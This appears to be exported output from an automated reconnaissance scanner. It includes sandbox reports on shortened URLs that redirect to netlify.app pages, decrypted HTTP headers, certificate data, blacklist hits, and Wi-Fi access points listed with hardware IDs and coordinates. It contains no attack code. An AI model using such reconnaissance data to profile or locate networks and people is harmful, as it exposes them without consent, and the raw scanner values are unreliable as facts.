u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /zkdr5qh HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rebrand.ly\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_18.232.255.120]\n\n "HTTP/1.1 301 Moved Permanently\nCache-Control: no-cache, no-store\nDate: Tue, 26 Jul 2022 05:21:46 GMT\nEngine: Rebrandly.redirect, version 2.1\nExpires: -1\nLocation: https://merry-sawine-195b34.netlify.app/\nStrict-Transport-Security: max-age=15552000\nContent-Length: 0\nConnection: keep-alive"- [Source: SSL_18.232.255.120]\n\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: merry-sawine-195b34.netlify.app"- 
[Source: SSL_35.229.48.116] | 35.229.48.116 |
| 2023-05-12 02:46:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:33:E6:06) | 34.0544, -118.244 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.68): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.22.0.232', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cutt.ly/aXzA6sp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_bd4_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bd4_IESQMMUTEX_0_331"\n "IsoScope_bd4_ConnHashTable<3028>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bd4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3028"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_bd4_IE_EarlyTabStart_0x860_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bd4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3028"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.0.232:443"\n "34.74.170.74:443"\n 
"151.101.24.193:443"\n "104.26.4.7:443"\n "23.58.146.135:80"\n "67.202.114.212:443"\n "91.199.212.52:80"\n "151.101.24.158:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"\n "crt.usertrust.com"\n "ocsp.sectigo.com"\n "i.imgur.com"\n "video.twimg.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar39D0.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab39CF.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" 
has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003484]\n "_72F96FE9-1F89-11ED-9450-080027D43B41_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "KPRDW9OF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KPRDW9OF.txt]- [targetUID: 00000000-00003028]\n "device.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003484]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003484]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "Cab39CF.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab39CF.tmp]- [targetUID: 00000000-00003484]\n "7423F88C7F265F0DEFC08EA88C3BDE45_C86B7000B5CEB7F9146D51D7AB048AFE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_C86B7000B5CEB7F9146D51D7AB048AFE]- [targetUID: 00000000-00003484]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003028]\n "E0968A1E3A40D2582E7FD463BAEB59CD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0968A1E3A40D2582E7FD463BAEB59CD]- [targetUID: 00000000-00003484]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type 
"data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003484]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 16x16 32 bits/pixel"- [targetUID: N/A]\n "index_1_.css" has type "ASCII text"- [targetUID: N/A]\n "pingjs_1_.js" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003028]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /aXzA6sp HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cutt.ly\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.22.0.232]\n\n "0"- [Source: SSL_104.22.0.232]\n\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: cozyfox.netlify.app"- [Source: SSL_34.74.170.74]\n\n "pdL!"hBo%y[/Hd\'Lx?Np2B/5tO$3LEBD9:>;=8EVm\n2j\\VkO9XFG!x9\\5IcsE3`Jto{8i;%04B4Lhr;;Aqo{*Fh#qw{tB@u\\gqIPpEdMRoGS$dg\'#e)Jq_}vimuxpM5wh{g7y<f6~yr*O\n=\nC?P\\>|@{8*l^iFAVt;z7_rk_[:&f.iy/CFns7esgO/_\\<~bIfmp|Ky7lrkk>xp8Q?Th"- [Source: 
SSL_34.74.170.74]\n, "GET /d6CE5mr.png HTTP/1.1\nAccept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5\nReferer: https://cozyfox.netlify.app/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: i.imgur.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_151.101.24.193]\n, "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 12161\nLast-Modified: Thu\n 07 Jul 2022 21:19:55 GMT\nETag: "af7c51313b7c4188cf839b655156702a"\nContent-Type: image/png\ncache-control: public\n max-age=31536000\nAccept-Ranges: bytes\nDate: Fri\n 19 Aug 2022 08:38:09 GMT\nAge: 875904\nX-Served-By: cache-iad-kjyo7100064-IAD\n cache-lax10679-LGB\nX-Cache: HIT\n HIT\nX-Cache-Hits: 1\n 1\nX-Timer: S1660898290.859840\nVS0\nVE1\nStrict-Transport-Security: max-age=300\nAccess-Control-Allow-Methods: GET\n OPTIONS\nAccess-Control-Allow-Origin: *\nServer: cat factory 1.0\nX-Content-Type-Options: nosniff"- [Source: SSL_151.101.24.193] | 34.74.170.74 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sternmismuschel (Net ID: 00:01:E3:C9:B9:3F) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Juggernaut (Net ID: 00:0C:41:D7:E4:AF) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:58:10 | SSL Certificate - Raw Data | No | Certificate Transparency | 7 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
| ayhu.xyz |
| 2023-05-12 02:44:59 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.108.153 |
| 2023-05-12 03:41:52 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | microsoft windows | 45.131.109.53 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P<]00D^20&51%1C35&6H'%***%Ph (Net ID: 00:06:66:2A:52:5E) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.2): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 02:48:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.coolroof.biz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IE_EarlyTabStart_0xb9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b74_IESQMMUTEX_0_303"\n "IsoScope_b74_IESQMMUTEX_0_519"\n "IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', 
u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.235.199.120:80"\n "23.235.199.120:443"\n "142.250.191.42:443"\n "50.18.123.174:443"\n "142.250.191.40:443"\n "162.159.138.60:443"\n "13.227.74.3:443"\n "52.9.93.55:443"\n "13.227.74.65:443"\n "142.251.46.226:443"\n "13.227.74.101:443"\n "142.250.191.46:443"\n "13.227.21.156:443"\n "13.227.74.12:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.coolroof.biz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"birdeye.com"\n "player.vimeo.com"\n "rms.footbridgemedia.com"\n "www.coolroof.biz"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." 
(Indicator: "twitter")\n "_.merge(PublicForm.prototype,{formLogic:new WufooFormLogic(),fieldLogic:new WufooFieldLogic(),runningTotal:\'\',ruleLogic:\'\',formHeight:\'\',timerActive:false,genericInputs:{},sortedTabindexes:[],isEntryManager:false,unableToChangeFile:\'We were unable to change your file.\',runInit:function(){var redirectingToPaymentPage=this.continueToPaypal();this.initCalendars();this.formLogic.setLoadTime();this.formLogic.observeFormSubmit();this.fieldLogic.initializeFocus();this.fieldLogic.showRangeCounters();if(!redirectingToPaymentPage){this.formLogic.initAutoResize(0);}" (Indicator: "paypal")\n "if(nextField){nextField.focus();if(event&&event.preventDefault){event.preventDefault();}else{return false;}}}},setFormHeight:function(){this.formHeight=document.body.offsetHeight+this.formLogic.offset;},continueToPaypal:function(){var redirectingToPaymentPage=false;var $merchant=$(\'#merchant\');var $merchantMessageText=$(\'#merchantMessageText\');if($merchant.length){redirectingToPaymentPage=true;if($merchantMessageText.length){$merchantMessageText.show();$(\'#merchantButton\').hide();}" (Indicator: "paypal")\n "{state:0,transportUrl:b,context:c,parent:li()},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+le.ca+"&cx=c";Oo()&&(f+="&sign="+le.Zd);var g=ue||we?No(b,f):void 0;g||(g=xl("https://","http://",le.od+f));fi().destination[a]={state:1,context:c,parent:li()};Hb(g)}};function Po(){if(di()){return!0}return!1};var So=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),To={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Uo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: 
"youtube")\n "{state:0,transportUrl:b,context:c,parent:Ll()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Kh.ia+"&cx=c";os()&&(f+="&sign="+Kh.Re);var g=Th||Vh?ns(b,f):void 0;g||(g=Zo("https://","http://",Kh.ue+f));Fl().destination[a]={state:1,context:c,parent:Ll()};mc(g)}};function ps(){if(Dl()){return!0}return!1};var ss=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ts={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},us={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var ew=function(a,b,c){function d(){var g=a();f+=e?(Va()-e)*g.playbackRate/1E3:0;e=Va()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Kg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Kg*h):Math.round(n.Hi),r=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100),t=H.hidden?!1:.5<=Nk(c);d();var u=void 0;void 0!==b&&(u=[b]);var v=Hv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube")\n "[]);if(!g.length)return!0;var h=rx(a,c,e);P(121);"https://www.facebook.com/tr/"===h["gtm.elementUrl"]&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===h["gtm.elementUrl"])return!0;if(d&&f){for(var m=fb(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},ux=function(){var a=[],b=function(c){return Ka(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);" (Indicator: "facebook.com")\n "var my=function(a,b,c,d,e){var 
f=Lv("fsl",c?"nv.mwt":"mwt",0),g;g=c?Lv("fsl","nv.ids",[]):Lv("fsl","ids",[]);if(!g.length)return!0;var h=Hv(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);P(121);"https://www.facebook.com/tr/"===m&&P(122);if(T(79)&&"https://www.facebook.com/tr/"===m)return!0;h["gtm.elementUrl"]=m;null!=a.getAttribute("name")&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&" (Indicator: "facebook.com")\n "b,"vert.pix");break;case "PERCENT":My(d.verticalThresholds,b,"vert.pct")}Lv("sdl","init",!1)?Lv("sdl","pending",!1)||J(function(){return Ny()}):(Jv("sdl","init",!0),Jv("sdl","pending",!0),J(function(){Ny();if(Oy()){var e=Py();qc(z,"scroll",e);qc(z,"resize",e)}else Jv("sdl","init",!1)}));return b}Ty.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"]),Uy=["www.youtube.com","www.youtube-nocookie.com"],Vy,Wy=!1;" (Indicator: "youtube")\n "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Fg:d,Dg:e,Eg:f,jh:g,kh:h,Qd:m,ib:b},p=z.YT,q=function(){bz(n)};if(p)return p.ready&&p.ready(q),b;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};J(function(){for(var t=H.getElementsByTagName("script"),u=t.length,v=0;v<u;v++){var w=t[v].getAttribute("src");if(ez(w,"iframe_api")||ez(w,"player_api"))return b}for(var x=H.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!Wy&&cz(x[A],n.Qd))return mc("https://www.youtube.com/iframe_api")," (Indicator: "youtube")\n "Wy=!0,b});return b}fz.N="internal.enableAutoEventOnYouTubeActivity";var gz;function hz(a){var b=!1;return b}hz.N="internal.evaluateMatchingRules";" (Indicator: "youtube")\n "* Copyright 2011-2018 Twitter, Inc." 
